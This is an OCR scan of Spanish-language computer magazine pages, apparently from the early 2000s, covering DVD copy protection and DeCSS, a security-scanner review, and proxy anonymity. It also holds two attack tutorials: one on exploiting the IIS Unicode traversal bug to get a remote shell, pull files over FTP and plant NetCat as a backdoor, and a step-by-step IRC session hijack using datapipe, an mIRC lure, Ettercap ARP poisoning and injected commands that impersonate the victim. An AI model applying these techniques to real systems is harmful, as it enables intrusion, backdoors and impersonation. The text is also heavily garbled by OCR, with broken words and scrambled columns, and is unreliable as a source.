Entendámonos, no es que las empresas 
cinematográficas Se le an quedado 
hasta ahora cruzados do manos. Los 
. DVD en el mercado disponen de dispo- 
pa sitivos anticopia que todavía pueden ser 
uy | fácilmente esquivados. Entre los siste- 
mas anticopia más extendidos hay e 

3 |Content Scrambling System (CSS), 
¡2 [esquema de encriptación y de ati 
¡1 + [cación de datos ideado para evitar la 
copia de ficheros de video directamente 
del disco. desgraciadamente para los 
productores ya en el año 1999 un hac- 
ker noruego de dieciséis años, Jon 
Johansen, ideó y colgó en la red, un 
programa llamado DeCSS utilizable en 
Pc's equipados con sistemas operati- 
vos Linux el cual permite la copia 
ti. el disco duro y la reproduc- 
» ción ¡limitada de copias 
mm». de DVD. Punto y a 

Ma parte. 
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TURES 


di 
le 
le: 
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siria cinematográfip, mo Que 
que no, por Mucha y, ee 'Po 1 


ps, 19> asible ante el Probir. 
ha gente copia 1osP ne ema) 


pirate? el DU 


Ente del mundo pe Qe Santo 
Pira tas sepan más qu 


ruidos se presume imperceptibles para 
la oreja o el ojo humanos. Esas marcas 
podrán ser reconocidos por los repro- 
ductores y grabadoras. De este modo 
si una copia desproveída de la filigra- 
na electrónica se carga en una graba- 
dora, la operación de copia no será 
posible, ni tampoco los lectores DVD 
podrán leer las copias piratas si no lle- 
van la marca electrónica de la casa 
productora. De esta manera será prác- 
ticamente imposible duplicar los DVD, 
aunque también leer aquellos even- 
tualmente realizados ilegalmente, una 
doble protección que parece verdade- 
ramente a prueba de bomba. Todo es- 
to ha hecho que,la alianza entre pro- 
ductores de hardware e industria del vi- 
deo digital vaya a buen puerto, aunque 
aun sea difícil decir si con ella se ven- 
cerá definitivamente la piratería. Algu- 

nas dudas quedan. : 


>> Cuando se 
endurete el juego... 


Otros sistemas para combatir la pirate- 
ría han sido introducidos recientemen- 
te. Lamentablemente para las grandes 
compañías discográficas han sido ide- 
ados otros tantos sistemas de desen- 
criptación cada vez más eficientes y fá- 
ciles de usar. Es el caso “del reciente 
SmartRipper, que se puede descar- 
gar muy fácilmente de Internet, y es ca- 
paz de evitar los sistemas anticopia, ti- 
po CSS, contenidos en los DVD. Por es- 
te motivo que las compañías que ope- 
ran en el sector del video han decidido 
cambiar el rumbo de su lucha contra la 
piratería. Un viejo dicho reza: “si no 
puedes con ellos, únete a ellos”, obvia- 
mente esta máxima no es aplicable al 
mundo de la piratería que difícilmente 
sería propenso a firmar acuerdos con 
multinacionales de cualquier sector. 
Como mucho se puede concebir una 
alianza con los productores de graba- 
doras y lectores DVD que de algún mo- 
do forman involuntariamente parte de 
la “cadena” que lleva a la realización 
de copies piratas. La idea que se está 
estudiando actualmente consiste en 
equipar los DVD con una filigrana elec- 
trónica (Watermarking Review Panel) 
instalable en los lectores y grabadoras 
DVD de nueva generación, que son fa- 
bricados con las debidas especificacio- 
nes técnicas. La filigrana es la misma 
que se usa para los DVD-audio y mar- 
cará permanentemente cada una de 
las secuencias video o audio con unos 


>» La sentencia 


Ha levantado ampollas la reciente sen- 
tencia del. tribunal de apelaciones de 
Nueva York que ha condenado el pro- 
pietario de una web (nb web 2000) 
prohibiéndole mantener el link que 
permite bajarse el programa DeCSS, o 
sea, el software que evita las proteccio- 
nes del DVD y permite copiarlos fácil- 
mente al PC para poderlo reproducir. 
Según la corte neoyorquina el uso de 
un código como.el del DeCSS conlle- 
va implícitamente la reproducción ile- 
gal de copias de DVD. protegidas por 
un copyright. Pero esta sentencia no 
debería ser por sí-sola tan comentada, 
de hecho no hace si no recuperar una 
ley, bastante discutida, conocida como 
Digital Millennium Copyright Act 
(DMCA) aprovada en 1998 y que de 
algún modo protege el “código infor- 
mático”, reconociendo que también el 
software debe ser íntegramente prote- 
gido por un copyright. 
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= SEGURIDAD. E 


Didor? ¿Creéis q 


¿Queréis verificar la seguridad de vuestro ; 
un o varios bugs? Basta con usar un softw 


EN 
uno de los mejores 


anner y ya pu£ 


sali 


o menos lo mismo: en ambiente Win- 
dows, por ejemplo, el más famoso (y 
uno de los más caros) es, sin duda, Re- 
tina; recientemente también Microsoft 
ha lanzado un scanner de seguridad. 
En Linux tenemos los famosísimos SA- 
TAN, SAINT, y el indiscutible Nessus. 
Shadows Security Scanner se presenta 
como un paquete instalable de solo 3,4 
Mega, que se puede descargar en ver- 
sión shareware en el web de su progra- 
mador (Red Shadow) www.safety- 
lab.com: Si en sus primeras versiones 
SSS resultaba poco más que una buena 
herramienta escrito por un apasionado 
del hacking 8 co (de hecho, el progra- 
ma recordaba el “black hat”, también 
en los gráficos) el gran éxito obtenido ha 
empujado a sus creadores a darle un 


¡a seguridad informática empie- 
za a interesar a las empresas: la 
creciente sensibilidad por parte 
de los profesionales y otros 
usuarios hacia este tipo de problemas 
¡ empujando el mercado a encontrar 
ciones que puedan satisfacer la “ne- 


as presentes en el sistema, 
así como también la solución a aplicar y 
los varios links dónde se puede obtener 
información detallada sobre cualquiera 
de las vulnerabilidades señaladas. 


a parte de proporcionar nuevos 
9s para un negocio que hoy pa- 
na efervescencia. Desde este 
sta es natural que se produz- 
os proyectos orientados a la 
seguridad y es muy elevada la cantidad 
de softwares que hoy en día hay dispo- 
nibles en la red para que pueda utilizar- 
los quién tenga la necesidad de meter un 
“trapo” a su server. A veces la calidad es 


22-Shadow Security 
Canner | 


Como se ha dicho, se comercializan 
muchos otros softwares que hacen más 
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Si partimos de la frecuencia con la 
que encontramos por la red empre- 
sas que hospedan 250 webs comer- 
ciales y que nunca han hecho pasar 
por el servidor un service pack para 
NT 4.0, vemos que la difusión y el uso 
de softwares de este tipo es, sin duda, 
muy positiva. 

Por lo tanto, es sensato confiar la se- 
guridad de nuestros servidores a SSS. 
Y creo que teniendo en cuenta su ba- 
jísimo coste (Retina ofrece más, es ver- 
dad, pero por menos cuesta 100 ve- 
ces más), y recordando siempre que 
nunca se podrán obtener unos resul- 
tados comparables a los que 


para efectuar los escaneados y aplicar- 
los combinados con una host-list. Si por 
ejemplo en nuestra red hay dos servers, 
uno Linux y uno NT, podremos decir a 
SSS que en el primero se efectúen con- 
troles sobre los servicios típicos para 
máquinas Linux, mientras que para el 
segundo solo aquéllos aptos para de- 
tectar bugs de NT. El ahorro de tiempo 
es notable. Además, podemos fichar los 
escaneados (para hacerlos tal vez du- 
rante la noche o en condiciones de po- 
co tráfico en la red) y efectuar tests es- 
pecíficos para los denial of services y 
password cracking (existen herramientas 
específicas para estas operaciones). 
Por lo que refiere a la actualización de la 
e Y 


tono decididamente más profesional y 
dirigido a las empresas. 

La interfase es clara y eficaz (hemos lle- 
gado ya a la versión 5.29), la instala- 
ción no presenta otra dificultad que pul- 
sar “next” en cada paso del wizard, y 
también utilizarlo es muy fácil: sólo es 
necesario insertar el host que se quiera 
escanear y pulsar “start”. 

Una vez hecho esto, el escáner empie- 
za a conectarse con una amplia gama 
de puertas remotas y empieza a colec- 
cionar información. 

En la segunda fase del test se efectúan 
todos los posibles tentativos de exploi- 
ting, password cracking y compañía 

que al final del escaneado nos permiti- experto de carne y hueso ros pue 
rán obtener un detallado informe (con garantizar, por lo menos es acon: al 
muchos gráficos inútiles.pero importar — ble probar la versión shareware y ha- 
tes para los agentes comerciales de “€ cer un par de escaneados: la cantidad 
aquellas empresas que van vendiendo A de “rojo” presente en el monitor será 
“seguridad” bajo forma de informes el mejor índice de consulta. 


generados en 5 minutos con AS 


re como este... 


“tener en cuenta que existen 
5, productos, algunos de 


Para cada “audit” encontrado (o sea, 
para cada posible falla) encontraremos 
una descripción del problema y un:po- 
sible test que habrá que efectua 
verificar-inequivocamente 

deniador está verdaderamente afectado 
l wg”Si, por ejemplo, se señala el 
popular “unicode ersal 

bug” encontraremos un ¡ 
creado con el pro 


base de dato vulnerabilidades, ésta 
también es una Operación muy simple 
¡gracias a un update automático, que 
descargará las nuevas versiones. y las 
instalará en pocos minutos. +: 
En definitiva, en sus últimas versiones 
SSS se ha orientado hacia los usuarios 
que necesitan un programa fácil de uti- 
lizar y más o menos fiab: 
Está claro que ningún 
podrá sustituir la consulta 
y que muy a menudo en lo me 
hay falsos positivos que igualmente nos 
obligan a intervenir para controlar que 
esté todo en su: sitio. Pero también es 
verdad que este programa, por como 
ha sido pensado y por lo que ofrece, 
funciona bien: muy controlado por sus 
programadores y, por lo tanto, modifi- 
cado a menudo y mejorado en algunos 
aspectos es, hoy en día, una solución 
económica (la licencia cuesta 100 
dólares o menos) para las pequeñas 
empresas que no se pueden permitir un 
responsable de seguridad y que me- 
diante SSS consiguen “tapar” los bugs 
más evidentes. 


cer comandos reme 


posible que también quién n 
dor, o si pel de 


pueda permitirse un..experto 


os de seguridad que quién 
a instalar NT y a conectar el en- 
n la tarjeta de red. La otra cara 
de la moneda es el uso destructivo que 
'se puede hacer de estos programas: de 
hecho podemos ir y escanear cualquier 
host, obteniendo mucha información 
sobre el sistema operativo y sobre los 
servicios que tiene instalados; y proba- 
blemente sea verdad que muchos cha- 
vales se encuentran con un instrumento 
más bien potente entre las manos que, 
además, les proporciona URLs malfor- 
mados a propósito para poder realizar 
comandos remotos sobre un servidor 
con un simple clic. Pero se vuelve siem- 
pre a lo mismo: no se puede juzgar si 
un instrumento es bueno o malo. Bueno 
o malo es el uso que se hace de ello. 


ity focus que nos lle- 
Cuestión. 
ciona una descrip- 
entos a seguir pa- 


lidad dada; en 


sistema, es posible corregir el pro! 
clicando simplemente un botón “Fi 
aunque se nos advierte que este proce- 
dimiento no siempre es eficaz... 
Si entramos con más profundidad en 
las distintas opciones que SS$S nos ofre- 
ce, empezamos a encontrar varias co- 
sas que lo convierten en algo aún más 
interesante: es posible editar las políti- 
cas que utiliza el motor del programa 
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= SEGURIDAD. BM 


UNA PELIGROSA GRIETA PARA EL WINDOWS XP 


¡Salmones 
¿sombre 


¿Qué pensaríais 1% 


a E : Un 


si alguien os dijera 17) | , y 
que un extraño puede 
tomar posesión de 

vuestro PC y controlarlo 

a distancia? ¿Ciencia ficción? 
Si sois administradores 

de un servidor web basado  / 
en el Windows NT podría ser +. 


que os convirtierais en ds / Y y s 
ABRO An 
protagonistas de la invasión JE Y, il 
h [4 " >. 
de los ultracuerpos. e dl 


de un sistema de codificación univer- 
sal de los caracteres, válido, eso es, para 
cada plataforma, aplicación o lengua exis- 
tente. 


ción, Desgraciadamente muchos de ellos 
actúan conflictivamente entre sí, y banal- 
mente, sucede que un documento codifica- 
do en un cierto modo y que se apoya en un 
standard determinado es sólo parcialmen- 
te, cuando no absolutamente ilegible, en 
otra aplicación. 

La llegada de Internet con su consiguien- 
te incremento de ordenadores en todo el 
mundo ha hecho necesario el desarrollo de 
un sistema universal de codificación para 
no obligar a los usuarios y los proveedores 
a volverse.locos con los URL, que resultan 
equivocados en un sistema pero válidos en 
otros, documentos de texto que sustituyen 
caracteres entre ellos si son leídos con un 
procesador de texto en vez de con otro, etc. 

Basta que pensemos por un momento en 
todos esos pueblos que utilizan alfabetos 
distintos del románico (para entendernos, 
japonés, chino, árabe,...) para que nos de- 


unque se trate de una vulne- 
rabilidad conocida y, afortuna- 
damente, corregida desde ha- 
ce ya unos cuantos meses (lo 
que en términos informáticos 
significa “una época”), son muchos los ad- 
ministradores de sistemas Windows NT (4.0 
o 5.0) que aún no han aplicado los repa- 
radores de Microsoft, y que, por tanto, aun 
hoy, siguen exponiendo sus propios servi- 
dores a esta vulnerabilidad. 


>» ¿Que es Unicode? 


Para poder representar los caracteres al- 
fanuméricos por medio de un ordenador 
(que en general se encuentra más a gusto 
con los números), hasta ahora, se han ela- 
borado numerosos sistemas de codifica- 


Intentemos entender, pues, de que se tra- 
ta exactamente, como y porqué funciona y 
qué problemas se derivan de una imple- 
mentación de este bug. De hecho, se trata 
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mos cuenta de que la llegada de este stan- 
dard ha supuesto un gran salto hacia de- 
lante en lo que se refiere a la transferibi- 
lidad de las informaciones en red. 

Lo que nos interesa en mayor medida es 
la implementación de unicode en los di- 
versos sistemas operativos que ofrecen 
servicios en red: un servidor web, por 
ejemplo, sabrá reconocer un URL sea cual 
sea el navegador desde el que haya sido 
llamado (Explore, Netscape, Mozilla...) 
mediante esta codificación. 

Un día, jugueteando alegremente en su 
teclado, un individuo anónimo descubrió 
(probablemente casi por casualidad) que 
un URL de este tipo sólo le devolvía el di- 
rectorio 


ca del host “address.of.iis5.system”, lan- 
zando a distancia una orden presente en 
el host. Cosa que no hace falta decir no 
tendría que suceder nunca. Si en lugar de 
ese “dir+ci” final pusiéramos cualquier 
otra cosa, es fácil intuir los problemas de 
seguridad que conllevaría. El truco es fá- 
cil: la implementación Unicode propia de 
los servidores web Microsoft Internet Infor- 
mation Server tiene una imperfección que 
nos permite “remontar” entre los directo- 
rios del sistema hasta salir de aquello en el 
cual normalmente deberíamos haber ac- 
cedido mediante lectura (Inetpub e seme- 
jantes, donde precisamente residen los fi- 
cheros web), exactamente del mismo mo- 
do como los salmones consiguen re- 
montar la corriente de los ríos para reen- 
contranos luego en la carpeta principal. 
Desde aquí, una llamada a 
winnt/system32/cmd.exe nos proporciona 
una shell remota; la posibilidad de ejecu- 
tar cualquier instrucción en el servidor. 
Es en este punto que interviene (de una 
forma negativa) la implementación de 


| Unicode en el interior de IIS. Cuando al 
| servidor web en cuestión le pedimos una 
| cosa como “.A.A” él la descarta en cuan- 


to equivocada. Por desgracia (o por suerte) 
si la misma petición se hace mediante la 
codificación unicode, ésta última es recogi- 
da como “buena” y por consiguiente pro- 
cesada. Por tanto, si en vez de “.A..Y” po- 
nemos su correspondiente valor unicode, 
estaremos, ya, en condiciones de “remontar 
la corriente” evitando el directorio asignado 
en la lectura web. En este punto hemos ac- 
cedido a los datos contenidos en el sistema, 
pero lo peor, como ya hemos apuntado, es 
que una vez encontrada una shell (cmd.exe 
por ejemplo) podemos ejecutar órdenes ar- 
bitrariamente en el servidor web. Si en el 
ordenador víctima pudiésemos por ejemplo 
cargar ficheros, sería muy sencillo montar 
encima una backdoor y obtener un acceso 
total al sistema. De hecho, es suficiente con 
utilizar el más clásico de los métodos de 
transferencia de datos: FTP 

El problema con que nos encontramos es 
que no basta con lanzar el FTP al orde- 
nador remoto porque la ejecución de la 
orden no haría otra cosa que lanzar el pro- 
ceso relativo, dejándonos luego con nuestra 
shell en vez de con la del FTP y por tanto, 
con la imposibilidad de utilizarlo. Por suerte 
el FTP acepta parámetros entre los cuales 
hay por ejemplo “-s nombrefile”, el cual 
nos permite poner en cualquier fichero una 
lista de órdenes que deben ser ejecutadas 
por el FTP en una sola llamada. 

En este sentido, bastaría pues con poder 
escribir dentro de un fichero las instruccio- 
nes adecuadas para que después el FTP las 
hiciera cumplir: para hacer esto solo tendrí- 
amos que utilizar la orden “echo”: 

Esta línea añadirá la siguiente string, por 
ejemplo: “hello!” al fichero 
“eNtest.txt”. 

Ya os habréis imaginado como termina- 
rá: por medio de “echo” prepararemos la 
lista de órdenes que debe ejecutar el FTR 
luego, mediante éste extraeremos de nues- 
tro ordenador (en el que, de forma preven- 
tiva habremos instalado un servidor FTP) el 
fichero que nos interesa cargar. 

No hace falta decir que la cosa más sen- 
cilla es enviarle a la victima un NetCat que 
lanzaremos más tarde en la modalidad 
shadow: a continuación nos conectaremos 
mediante una sencilla sessión telnet que 
nos permitirá un acceso remoto al ordena- 
dor, con la posibilidad de utilizarla exacta- 
mente como si fuera nuestra propia shell de 
MS-DOS. La 


Para introducirse | 
por entre la grieta 4 
de Unicode es 
suficiente con 
utilizar el más 
clásico de los f 
métodos de 
transferencia de datos: FTP. 
El problema con que nos 
encontramos es que no basta 
con lanzar el FTP al aparato 
remoto en tanto que la 
ejecución de la orden no 
haría otra cosa que lanzar el 
proceso relativo, dejando 
luego a la presa con nuestra 
shell en vez de con la del 
FTP, y por tanto, con la 
imposibilidad de utilizarlo. 
Por suerte el FTP acepta 
parámetros como por ejemplo 
1-s nombrefile”, el cual nos 
permite poner en cualquier 
fichero una lista de órdenes 
que deben ser ejecutadas por 
el FTP en una sola llamada. 
En este sentido, bastaría 
pues con poder escribir 
dentro de un fichero las 
instrucciones adecuadas para 
que después el FTP las 
hiciera cumplir: para hacer 
esto sólo tendríamos que 
utilizar la orden “echo”: 
Esta línea añadirá la serie: 
“hello!” al fichero 
tG:Ntest.txt”. 
Por medio de “echo” 
prepararemos la lista de 
órdenes que debe ejecutar el 
FTP, luego, mediante éste 
extraeremos de nuestro 
ordenador (en el que, de 
forma preventiva habremos 
instalado un servidor FTP) el 
fichero que nos interesa 
descargar. No hace falta 
decir que la cosa más 
sencilla es enviarle a la 
victima un buen NetCat que 
lanzaremos más tarde en la 
modalidad shadow: a 
continuación nos conectaremos 
mediante una sencilla sessión 
telnet que nos permitirá un 
acceso remoto al ordenador, 
con la posibilidad de 
utilizarla exactamente como 
si fuera nuestra propia shell 
de MS-DOS. 


, 
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LA PRECARIA PRIVACIDAD DE LA COMUNICACIÓN IRC 


LISTA DE LA “COMPRA” 


Premisa 
Introducción 
Requisitos 
Hijacking 

Datapipe 

MIRC Bug 

Ettercap 
Characters injection 
Recursos 


1 Premisa 


No es intención del autor del presente 
artículo incentivar a alguna acción que 
vaya a lesionar la privacidad, pero con 
el presente se intenta demostrar la extre- 
ma facilidad con la cual un usuario 
malintencionado puede lograr un ata- 
que para minar la comunicación duran- 
te una sesión IRC. 


2 Introducción 


La finalidad de este artículo es la de ilus- 
trar una técnica que permite tomar 
posesión de la sesión de un usuario con 
el fin de enviar mensajes al canal y rela- 
cionarse con cada comando del Server 
IRC en general. 


3 Requisitos 


He aquí una breve lista de lo que he 
necesitado para poner en práctica lo 
que veréis a continuación. le 
Datapipe 

Permite redirigir el tráfico de ingreso a 
un determinado puerto del host local 
hacia un host y un puerto arbitrario. 


L hija 


Teo, 
al 


Ettercap permite hacer hijacking utilizan- 
do una técnica conocida como ARP poi- 
sonin e permite envenenar la cache 
ARP hos local con el fin de alterar el 
proceso de resolución de las direcciones 
IP en direcciones MAC 


IRC: Internet Relay Chat 
Protocolo para el chat en 
internet. Un servidor puede tener 
numerosas salas de chat 
llamadas también channels. 


Ettercap 

Es una herramienta que permite rastre- 
ar y hacer hijacking de una sesión, utili- 
zando múltiples técnicas, entre las cua- 
les el envenenamiento de la cache ARP: 
técnica será la que usaré más adelante. 


>LAN con dos host Unix/Linux conecta- 
dos a internet. El primero ejecutará el 
datapipe y seró el host de la sesión, el 
el lesde el que ejecutare- 
), para hacer hijacking de la 

sesión que rebolta sobre nosotros. 


dl Hijacking 
Y 


4, IDatapipe + 
Buscad un. depa personalmente he 
utilizado datapif eff Lawson), 
poned en escucha el puerto 6667 
mediante la utilización del datapipe sobre 
-uno de los dos host que forman parte de 
vuestra red local está hecho de modo que 
el trafico que ingresa a este puerto vaya 
redirigido hacia el servidor irc sobre el 
- puerto 6667 del host ejemplo: 


attackerOdatapipe:-$ ./datapipe 


192.168.1.5 6667 irc.azzurra.org 
6667 
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CK 


Pt e 


| Hijacking: es una técnica que 

a permite entrometerse en una cone- 
xión y tomar el control. Muchas 
veces bastaría usar un sniffer (ras- 
treador) para capturar nombre 'de 
usuario y password para poder 
conectarse “legalmente”. 
Pero es posible encontrarse en 
situaciones en las cuales se viene 
usando una password “use y arro- 
je” y por lo tanto, incluso si el ata- 
cante lograra rastrear alguna, 
cuando fuera a usarla estaría ya 
caduca. 


En este punto cuales sean las conexiones 
ingresantes al puerto 6667 del host local 
192.168.1.5 vendrá redirigido hacia el 
servidor IRC de Azzurra. Ahora no 
queda mas que “natear” (2) en el puer- 
to 6667 sobre vuestro router de confín 
para permitir una conexión provenie 
del exterior hacia el host local que ej 
cuta el datapipe. e 
(2) natear : de NAT (Nerwork Ádress 
Translation), permite la traducción de! 
una dirección IP en otra, en nuestro caso 


permite relacionar el puerto 6667 del 
+ | router con el mismo puerto de un host 
| de la red local (192.168.1.5) con el fin 
de permitir el acceso de parte del host | 
externo. 


4.2 MLRC Bug 

Ahora vuestro sistema está listo para 
recibir una conexión de parte de un 
usuario remoto, el cual verá encamina- 
do de vuelta por medio del datapipe al 
server IRC en forma totalmente traspa- 
rente. No debéis hacer otra cosa que | 
encontrar que se conecta con el cliente 
IRC a vuestro datapipe. 


Un usuario malicioso podría aprovechar | 


un bug bastante conocido del mIRC 5.9 
y 5.91 para hacer conectar a la víctima 
al propio datapipe, la vulnerabilidad 


consiste en la posibilidad de construir | 


una página web que contiene un parti- 
cular tag html que permite lanzar al 
| cliente mIRC y hacerlo conectar con un 


EN raaio ig vuestro | 1P:6667" 


Bastará con que la víctima visite la pági- 
na web que contiene el tag html recién 
dado para causar la conexión de la 
misma al IP especificado. 


4.3 Ettercap 


Ahora que tenéis un usuario potencial 
conectado al servidor IRC por medio 
de vuestro datapipe podéis. alterar la 
sesión de tal usuario a vuestro gusto. 
Ettercap permite hacer hijacking de 
modo simple y eficaz usando una téc- 
nica conocida como ARP poisoning 
que consiste en envenenar la cache 
ARP del host local con el fin de alterar 
el proceso de resolución de la direc- 
ción IP en dirección MAC. 

Ettercap en cambio permite introducir 
el tráfico arbitrario en el interior de la 
sesión procediendo a recalcular los 
campos sequence number y aknowled- 
gement number para mantener la sin- 
cronización de la conexión. 

La utilización de un segundo host se 
hace necesaria en cuanto Ettercap NO 
permite el envenenamiento de la 
cache ARP del host donde lo ejecuta- 
mos, por lo tanto es imposible ejecutar 
el datapipe y Ettercap en el mismo 
host, por la limitación recién eviden- 


AttackerQattack:% ettercap 
Ettercap.0.63.1 to, 
5 hosts ¡ in this LAN 
92 pS 974255.255.255:0) 
72.168 á 1) 192.168.1.4 
12) 192. 168.1.1 


5) 192.168.1.5 5) 1 0 
A nt 


Bulz 
El menú principal de Ettercap está cons-- 


tituido por el elenco de los IP de los 


hosts locales que forman parte de la red 


local. 
Debemos 
elenco de la 


aquellos del host destinatario. 


- En nuestro caso el IP fuente es aquél del 
host sobre el cual está el datapipe o 


roceder a seleccionar del | 
izquierda los IP. del host | | 
del cual surge la sesión y de la derecha | | 


bien 192.168.1.5 y el IP del host desti- 
natario del gateaway esto es 
192.168.1.1 Una vez elegidas estas IP 
en la forma correcta será posible pro- 
ceder al envenenamiento de la cache 
ARP de los dos hosts mediante la pre- 
sión de la tecla A. 


Ettercap 0.6.3.1 


Source: 192.168.1.5 — Filter: Off dop- 
pleganger illithid (ARP Based) 
Dest: 192.168.1.1 —Active Dissector:ON 


5 hosts in this LAN (192.168.1,4: 
255;255,295.0) 


1) 212.171.XXX.XX:3600 
192.168.1.5:6667 silent 

2) 192.168.1.5:1028 
192.106.224.132:6667 silent 


<--> 


<--> 


Ahora el tráfico entre los dos host resul- 
ta desviado y podemos observar y modi- 
ficar a nuestro gusto los datos en ingre- 
so/salida. 

El ejemplo dado en 1) se refiere a la 
sesión establecida entre el cliente IRC 
remoto y el datapipe, mientras el núme- 
ro dos representa la sesión entre datapi- 
pe y servidor IRC. 


Datapipe: Programa que redi- 
recciona todo el paquete tcp diri- 

| gido a una puerta en una máqui- 
na hacia otra puerta en otra (o en 
la misma) máquina. 
Para mayor información: 
http://www.sOftpj.org/en/to 
ols.html 
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2) 


y comenzamos a ver el tráfico que tran- 
sita claramente en nuestro segmento de 
red, una breve conversación como 
ésta.. 

[00: 31: 11] <victim> Hola edzy 
[00:32:19] <E4zy> hola 

[00:33:03] <victim> ¿hola qué tal? 
[00:33:17] <E4zy> todo bien, gracias. 


...se encuentrará en output de Ettercap 
en un format menos claro: a la izquier- 
da el tráfico en output del client en direc- 
ción del server, y a la derecha el tráfico 
en output del server en dirección del 
client: 


Ettercap 0.6.3.1 


SOURCE: 192.168.1.5 — Filter: Of dop- 
pleganger illithid (ARP Based) 

DEST: 192.168.1.1 -Active 
Dissector:ON 


5 hosts in this LAN 
(192.168.1.4:255.255.255.0) 
192.168.1.5:1028 
192.106.224.132:6667 

PRIVMSG *ondaquadra: hola 
e4zy:E4zy!-none  arroba)AzzurraNet- 
65135.42-151. 

PRIVMSG Fondaquadra:hola, 
:E4zy!-noneAzzurraNet-65135.42-151 
net24.it PRIVMSG *ondaquadra: todo 
bien gracias 


ASCII 
ASCII 


Usando la tecla TAB es posible pasar de 
una mitad de pantalla a otra de modo 
tal de poder intervenir del lado del clien- 
te o del lado del servidor según donde 
se encuentra la ventana activa. 


BCharacter injection 


Por esto necesitamos mover el server 
side (una sola presión a la tecla TAB) con 
el fin de enviarles comandos de parte 
del cliente secuestrado, presionando la 


tecla | se abrirá una ventana que nos 


permite iniciar los comandos en el stre- 
am, que vendrá elaborado del servidor, 
vemos un ejemplo: 


Ettercap 0.6.3.1 

SOURCE: 192.168.1.5 Filter: OFF 
Doppleganger illithid (ARP based) 

DEST: 192.168.1.1 Active Dissector: ON 
5 hosts in this LAN (192,168.1.4: 
255.255:259,0 


— PRATICA .1 Ml 


192.168.1.5:1028 
192.106.224,132:6667 

PR Type characters to be injected (max 
1000):PR 

2-15 

PRIVMSG *Fondaquadra: Isoy estupido! 
Ain 

Todo 

2-151. 

todo 

2-15 

todo 

ASCII 


Cuando enviamos mandos en el lado 
server mejor si los hacemos seguir de los 
caracteres IAn que sustituyen la presión 
de la tecla ENVÍO, la que permite su eje- 
cución. He aquí el resultado del mando 
anterior : 


[00:31:11] <victim> hola e4zy 
[00:32:19] <E4zy> hola 

[00:33:03] <victim> ¿que tal? 
[00:33:17] < E4zy> todo bien, gracias 
[00:33:49] < ¡Soy estupido!> 


La última frase prononciada de la victi- 
ma, no es suya, sino es fruto de la 
injección de caracteres de parte del ata- 
cante en la sesión “secuestrada”. 

El client IRC de la victima será el Único a 
no visualizar ésta frase, por lo tanto ella 
no sospechara de nada. El mensaje sera 
todavía visible para todos los usuarios 
del canal. 

La injección de caracteres en la sesión 
TCP no se limita a dar la posibilidad de 
enviar.mensajes al canal de parte de la 
victima, sino permite la ejecución de 


todos tipos de mandos en el server IRC. 
A la sóla condición de conocer el proto- 
colo a nivel de aplicación con que el 
client y el server comúnican, en seguida 
os enseño unos ejemplos un poco más 
fantasiosos. 


JOIN*canal 

Hace que la víctima ingrese a un 

canal a vuestra elección. 

NICK nickname 

Cambia el nick de la víctima en uno de 
vuestro agrado 

MODO*canale +0 nickname 

Hace que la víctima seleccione. nickna- 
me en el canal especificado. 

PRIVMSG nickname: msg 

Envía una query al nickname de parte 
de la víctima conteniendo el texto msg. 
NsACCESS ADD mask 

Si el servidor IRC en el cual se encuentra 
la víctima dispone de servicios como 
Nickserv, podéis dar vuestra máscara de 
modo de ser reconocido como propieta- 
rio del nick .. . no seáis lamer :). 

Estos comando deberán estar siempre 
seguidos de los caracteres iAn que nos 
permitirá la ejecución por parte del ser- 
vidor. 

Intentando de rastrear una de vuestras 
sesiones seras capaz de evidenciar ulte- 
riores comandos utilizables en tal con- 
texto. 


% mount + mind/dev/brain/mnt/head 
README.ettercap.txt.k 4 
Elzy 


| NAT: Network Address Translation 
Sistema» que, interpuesto entre 
Internet y lasred. interna,..sirve para 
ocultar las direcciones IP de red del 
ordenador, sustituyéndola dinámi- 
camente otra. Esto consiste en ufili- 
zar el interior de una red dirección 
IP no oficial, aún cuando se corres- 
ponda con números IP realmente 
existentes en Internet. El ordenador 
usa esta IP en las comunicaciones 
internas en la red. 

Cuando el ordenador debe comu- 
nicarse con el exterior, el NAT le 
atribuye un número IP oficial con el 
cual viene desde el exterior. El NAT 
en cambio, combinado al ICS, per- 
mite a más ordenadores de la red 
local, compartir un acceso indivi- 
dual a Internet. 
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LA PRIVACY PRECARIA DELLE COMUNICAZIONI IRC 


LAS 
VERSIONES 
DE ETTERCAP 


De éste elenco cita- 

mos todas las direcciones rele- 
vantes que atañen a Ettercap, 
de la cual es posible efectuar 
el download ( incluso de la 
versión 6.5.0) y en las cuales 
se profundizan todas las sec- 
ciones tratadas en el articulo 
made in Onda Quadra. 


Homepage: 
http: //ettercap.sourceforge.net/ 


Tar/GZ: 
http: //ettercap.sourceforge.net/ 
index.php?s=download 


Changelog: 
http: //ettercap.sourceforge.net/ 
index.php?s=history 


RPM package: 
http: //ettercap.sourceforge.net/ 
index .php?s=downloadsp=binary 


Debian package: 
http: //ettercap.sourceforge.net/ 
index .php?s=download8p=binary 


CVS tree (cvsweb): 
http: //cvs.sourceforge.net/cgi 
-bin/viewcvs.cgi/ettercap 


EN LA RED. MB 


ESCONDER EL IP CON LOS SERVER PROXY 


Navegar anónimo - 


Cuando navegamos en Internet se nos clasifica, se nos Lea 
reconoce, nos descargan en el PC “cookies” para ficharnos pero 
existe, afortunadamente, una forma de escapar de todo esto... 


> Anonymizer. 
y sus hermanos... 


Siguiendo con en tema al dnorifas 
Lab add pl (hit 
com) es otra wi 
gar “de forma co 
po el IR.Pero no es el único. 
ve.com (http: //Www.iprive.com/b 
E E dex.html) prop sra mide d 

gación para integrar al browser 

> sen garant ¡ate rer 5). Se descarga en formato zip y se 
instala como un accesorio de Explorer 


la Privagy lr navegar en secreto..es 


iendo, la dirécción no en el espacio h 
- Para: evitar este tipo de intrusiones se pue- :bitual del browser si no en el de la ba-. 
den utilizar servidores Proxy o servidores ' 
que garafitezcan el anonimato interpo- 1://v m) es 
niéndose entre vosotros y el PC remoto dor pi oque ofre- 
li os estáis conectando y evitan-*+ 
= la transmisión de datos. Uno de los 
ds famosos tiene un "Si casi pre, 
+ “cocidos so ¿ga- | pl > ¿Anonymousgl(http://anony- 
A A mMouse.com/). os 
Aquí las e Are, pl verdade 
ene limitadas. Hay un espacio dispon 
de escribir la dirección de la pa- 
go que queréis visitar con toda seguri- 
_dad y completo anómimato. Navegando ' 
a partir de la ventana de Anonymouse se 
está. al seguro Bos “Cookies'*-y;ade- 
ncripta la grerción y los da- 
tos del ordenador del navegante y consi- 
gue también sanar algu roblemas 
de compatibilidad que generalmente na-: 


cen cuando se,visita sitios que utilizan | 
o Shockwave, dos 


Proxy Server: Servidor que se in- 
terpone entre la red interna e Inter- 
net para permitir un control de se- 
